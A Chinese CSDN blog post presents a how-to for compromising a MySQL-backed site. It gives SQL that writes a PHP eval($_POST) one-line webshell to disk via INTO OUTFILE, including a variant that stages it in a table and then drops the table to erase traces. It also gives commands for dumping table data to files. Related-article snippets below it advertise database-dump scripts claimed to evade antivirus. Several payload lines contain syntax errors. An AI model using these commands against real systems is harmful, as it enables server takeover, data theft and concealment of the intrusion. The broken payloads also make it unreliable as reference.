MYSQL数据库脱库写马写一句话

最新推荐文章于 2024-05-13 03:42:09 发布
最新推荐文章于 2024-05-13 03:42:09 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: 笔记 文章标签: 数据库 安全漏洞 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010062917/article/details/105739807
版权

0x00 前提条件

权限: 必须是ROOT
secure_file_priv的限制
可以使用 mysql命令查询 show variables like '%secure%’;

secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制

0x01 写入Websehll

  • 利用函数
  • - into dumpfile()
  • - into outfile()
  • - load_file()

01. 直接写入

注意:这个方法必须得是ROOT用户权限

  select '<php eval($_POST[shell])?>' into outfile 'c:\\shell.php'

02. 创建表单写入

1.先创建数据表

CREATE  table 'mysql'.'shell' ('webshell'  text not null)

2.向表单中写入一句话

insert Into  mysql.shell  values('<?php $eval($_POST[shell]);?>');

3.查询数据导出webshell

select 'webshell' from 'shell'  into outfile 'c:\\1.php'

4.删除表,清理痕迹。

drop table if exists 'shell'

0x02 脱库

0x1 Into outfile

select * from test into outfile '/tmp/test.txt'

0x2 Into dumpfile

 select * from test into dumpfile '/tmp/test.txt'

0x3 outfile 与dumpfile的脱裤区别

1.dumpfile只输出一行内容,outfile多行。
2.outfile函数在将数据写入到文件时会进行特殊格式转换 例如\n,则dumpfile则保持原数据格式。
在这里插入图片描述

WeUjie
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
裤打包 php
05-07
裤打包 php
php裤脚本
黑面小窝
11-04 3760
作者:ay暗影 因为某牛的需要,让俺一个脚本,要求:注入点是在要登入的情况下才能访问,裤的时候,直接将数据插入到数据库里,数据量大概在50w条记录左右。 看到以上要求,我想了想,感觉是还是php脚本比较适合点。 本人的脚本的优点: (1) 因为需要登入,所以可以自定义cookies (2)速度快,一般的工具都是一条一条记录的获取,而本脚本是10条为基本单位,因为考虑到grou
SQL注入-_mysql注入拖
最新发布
2401_84970035的博客
05-13 786
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
mysql 裤_mysql 裤()通用脚本
weixin_39987211的博客
01-18 622
TK:全面解密裤门内幕 --- hExIe Security Team...Mysql Database on Tables to Txt...This is a Php Example.#_E-mail:go_root@hotmail.com #_Author:HYrz--------------------------------------------------------Start M...
php裤教程,全自动裤脚本.php
weixin_32281549的博客
03-12 632
1,先给目标表减肥 (目的是把无用的字段去掉,减小体积)CREATE TABLE user4 AS SELECT uid,name,email,members_pass FROM ips_members;$sqlserver = 'localhost';$sqluser = 'root';$sqlname = 'test';$sqlpass = 'root';$con = mysql_connec...
&站分离渗透&解决MySQL禁止外连
热门推荐
Love&Share
11-22 1万+
文章目录打包数据库文件SQL语句打包数据库MySQLSQL server使用工具打包数据库分离渗透站分离判断方法站分离利用思路推荐阅读站分离打包数据库解决MySQL禁止外连蚁剑Navicat tunnel隧道 打包数据库文件 access 数据库:mdb格式直接下载 MySQL数据库:在路径mysql/data/下存放所有数据库,直接将文件夹复制到web目录tar打包下载 mssql数据库:msdbdata.mdf msdblog.ldf 两个文件复制,直接下载 SQL语句打包.
PHP脚本导出MySQL数据库
平凡老者
09-25 414
导出数据库的PHP脚本工具,数据库工具,PHP脚本
php pdo 绕过,php-带PDO的忘记密码脚本(需要解密)
weixin_29023445的博客
03-09 426
我可能有一个愚蠢的愚蠢的问题……我正在做一个被遗忘的密码脚本(当然是登录系统),但是我被卡住了.我创建了一个具有特殊ID的代码(有效,是的!),但是我无法对其进行解密…您能帮我吗?这是我创建特殊ID的功能:Recovery_Script.phpinclude "pdo.php"; if(isset($_POST["submit"]) AND isset($_POST["ForgotPassword...
教会你完全搞定MySQL数据库 轻松八句
09-11
MySQL数据库是关系型数据库管理系统,广泛应用于各种规模的Web应用中。本文将教你如何轻松掌握MySQL数据库的基本操作,只需理解并实践以下八点,就能基本应对大部分数据库管理需求。 1. **连接MySQL**: 连接MySQL...
浅谈MySQL数据库性能优化
12-14
 这里先引用一句,从内存中读取一个数据的时间消耗是微秒级别,而从普通硬盘上读取一个数据是在毫秒级别,二者相差3个数量级。可见,想对MySQL数据库进行优化,合理调配缓存参数显得更为直接  表缓存  相关...
mysql 本地数据库如何从远程数据库导数据
01-19
操作过程:打开【终端】,直接输入以下内容,点回车即可 就这一句哦! 用途:将远程服务器的数据库拷到本地。 Java代码 代码如下: mysqldump -h ‘114.212.111.123’ -uROSE -pxxxooo –opt –compress ITSM –...
PHP+MySQL
07-02
PHP+MySQL,WEBSHELL
php mysql 软件直接连接
09-14
php mysql 软件直接连接裤,秒连接,过任何杀软,可以拖10T以上数据库
MYSQL mssql
08-24
裤脚本 MYSQL mssql网站数据必备
详解mysql数据库如何开启慢查询日志
12-15
在配置文件my.ini中加上下面两句 log-slow-queries = C:\xampp\mysql_slow_query.log long_query_time=3 第一句使用来定义慢查询日志的路径(若是linux系统,会涉及权限问题) 第二句使用来定义用时超过过多少秒...
Mysql篇————基本知识
qq_49523975的博客
10-02 367
MySql数据库基本概念sql查询语句单表查询连接查询(多表查询)子查询(嵌套查询)Union(将查询结果集相加)limit(分页查询)表格的创建约束存储引擎事务索引视图数据库的三范式 数据库基本概念 一,SQL,DB,DBM分别是什么 DB:DataBase(数据库) DBMS:(数据库管理系统),常见的有MySql,Oracle,sqlSever… SQL:结构化查询语言,是一门标准通用的语言,标准sql通用所有的数据库产品 DBMS——(执行)—— SQl ——(操作)——DB 二,对表的理解: ①
mysql 裤_MYSQL_OUTPUT 裤()通用脚本(修正版)
weixin_39619170的博客
01-18 329
复制代码代码如下::: hExI3_Securi7y_TeAm...SCRIPT_FILENAME : =$_SERVER["PHP_SELF"]?>.font{size : 2px;}Mysql Database on Tables to Txt...#_E-mail:go_root#Hotmail.com#_Author:HYrz-----------------------------...
mysql盲注裤_记一次猥琐的
weixin_35201989的博客
02-28 386
简介环境php+pdo+mysql+linuxFUCK IT因为是pdo,所以支持多行,一开始只用了时间盲注跑了用户表的列出来,然后可以通过多行语句执行updaet user set email=(select group_concat(table_name) from information_schema.columns where table_schema=database()) where ...
MYSQL数据库讲解
qq_49422880的博客
04-01 2658
MYSQL数据库讲解0x01 前言0x02 日志🐎0x03 into outfile🐎 0x01 前言   最近正好在上数据库的课程,比较详细地学习了数据库各个方面地知识。感觉解决了之前不少的疑惑,再吐槽一下(学校开数据库这门课开的太晚了!)   下面进行分析与讲解数据库的过程。 0x02 日志🐎 众所周知我们所有的数据库的都有一个存放日志的文件,这个文件可以会进行记录数据库的操作语句,也可能不会记录数据库的操作语句,这却决于两个全局变量: general_log==>日志保存状态,有
mysql数据库 - 单表查询(三)
06-28
### 回答1: MySQL数据库中的单表查询(三)可以使用以下语句实现: 1. SELECT DISTINCT 列名 FROM 表名; 这句可以查询表中不重复的值。 2. SELECT 列名1, 列名2 FROM 表名 WHERE 条件; 这句可以查询表中满足条件的记录,并显示指定列。 3. SELECT COUNT(列名) FROM 表名; 这句可以统计表中记录的数量。 4. SELECT SUM(列名) FROM 表名; 这句可以求和表中某一列的值。 5. SELECT AVG(列名) FROM 表名; 这句可以求平均值表中某一列的值。 6. SELECT MAX(列名) FROM 表名; 这句可以查询表中某一列的最大值。 7. SELECT MIN(列名) FROM 表名; 这句可以查询表中某一列的最小值。 8. SELECT 列名 FROM 表名 ORDER BY 列名 [ASC|DESC]; 这句可以对表中记录进行排序。 9. SELECT 列名 FROM 表名 LIMIT 开始位置, 显示记录数; 这句可以限制结果显示的记录数。 ### 回答2: 在MySQL数据库单表查询的第三篇中,我们将学习适用于单表查询的一些高级查询技巧,使我们能够更有效地查询数据和优化查询性能。 1.使用DISTINCT关键字去除重复记录 在某些情况下,我们需要查询出一张表中的不重复的记录,此时可以使用DISTINCT关键字。DISTINCT关键字用于筛选出不同的值,查询所返回的结果集将去除重复数据。例如: SELECT DISTINCT name FROM student; 以上语句将会返回不同的name值。 2.使用ORDER BY排序查询结果 如果我们需要按照某个字段的值进行排序,就可以使用ORDER BY子句来实现。ORDER BY关键字默认按照升序排列,如果需要降序排列可以使用DESC关键字。例如: SELECT * FROM student ORDER BY age DESC; 以上查询语句将会按照age列的降序排列返回结果集。 3.使用LIMIT限制查询结果集的数量 当我们进行大量数据的查询时,使用LIMIT关键字来限制返回结果集的数量是一个非常有效的方法。 LIMIT子句用于指定查询的起始行和数据行数。例如: SELECT * FROM student LIMIT 10,5; 以上查询语句将返回从第11行开始的5行数据。 4.使用聚合函数查询数据 在MySQL中有五种聚合函数:COUNT、SUM、AVG、MAX、MIN。聚合函数用于对数据进行统计和计算。例如: SELECT COUNT(*) FROM student; 以上查询语句将返回student表中的记录数。 5.使用分组查询数据 GROUP BY子句用于将结果集按照指定列进行分组,一般与聚合函数一起使用。例如: SELECT age,COUNT(*) FROM student GROUP BY age; 以上查询语句将根据年龄对学生表进行分组,并统计每个年龄段学生的人数。 总之,单表查询是MySQL数据库中的重要部分,学习以上高级查询技巧能够更好地提高我们的查询效率和结果的准确性。 ### 回答3: MySQL数据库的单表查询是指在一个表中进行数据查询和筛选的操作。在进行单表查询的时候,需要注意一些基础的SQL语法和查询技巧。本文将介绍MySQL数据库单表查询的一些高级用法。 1. 条件查询 条件查询是单表查询最常用也最基础的一种查询方法。通过“WHERE”子句来限定查询的范围和条件,如: SELECT * FROM students WHERE age > 18; 这条语句将查询年龄大于18岁的学生信息。 同时,还可以使用“AND”和“OR”等逻辑运算符来组合多个查询条件: SELECT * FROM students WHERE age > 18 AND (gender = 'male' OR grade > 80); 这条语句将查询年龄大于18岁、并且性别为男性,或者成绩大于80分的学生信息。 2. 模糊查询 模糊查询是指在查询数据时,使用通配符匹配特定字符或字符串的查询方式。在MySQL中,常用的通配符有"%"和“_”,其中,"%"代表零个或多个字符,"_"代表一个字符。如: SELECT * FROM students WHERE name LIKE '%张%'; 这条语句将查询名字中包含“张”字符的学生信息。 3. 排序查询 排序查询是指按照某一列的值来对查询结果进行排序的操作。在MySQL中,通过“ORDER BY”子句来实现对查询结果的排序。如: SELECT * FROM students ORDER BY grade DESC; 这条语句将查询所有学生的信息,并按照成绩从高到低进行排序。 4. 分组查询 分组查询是指将数据按照某一列的值进行分组,并对每一组的数据进行统计分析的操作。在MySQL中,通过“GROUP BY”子句实现分组操作。如: SELECT grade, COUNT(*) FROM students GROUP BY grade; 这条语句将根据学生的成绩进行分组,并统计每组的学生数量。 5. 连接查询 连接查询是指在两个或多个表之间进行查询,通过关联查询得到所有相关数据的查询方式。在MySQL中,通过“JOIN”关键字实现表之间的连接。如: SELECT * FROM students JOIN scores ON students.id = scores.student_id; 这条语句将查询学生的信息和他们的成绩信息,同时通过“ON”子句将两个表进行关联查询。 综上所述,MySQL数据库的单表查询有很多复杂的查询方式,包括条件查询、模糊查询、排序查询、分组查询和连接查询等。在实际使用中,需要根据具体情况选择合适的查询方式,提高查询效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值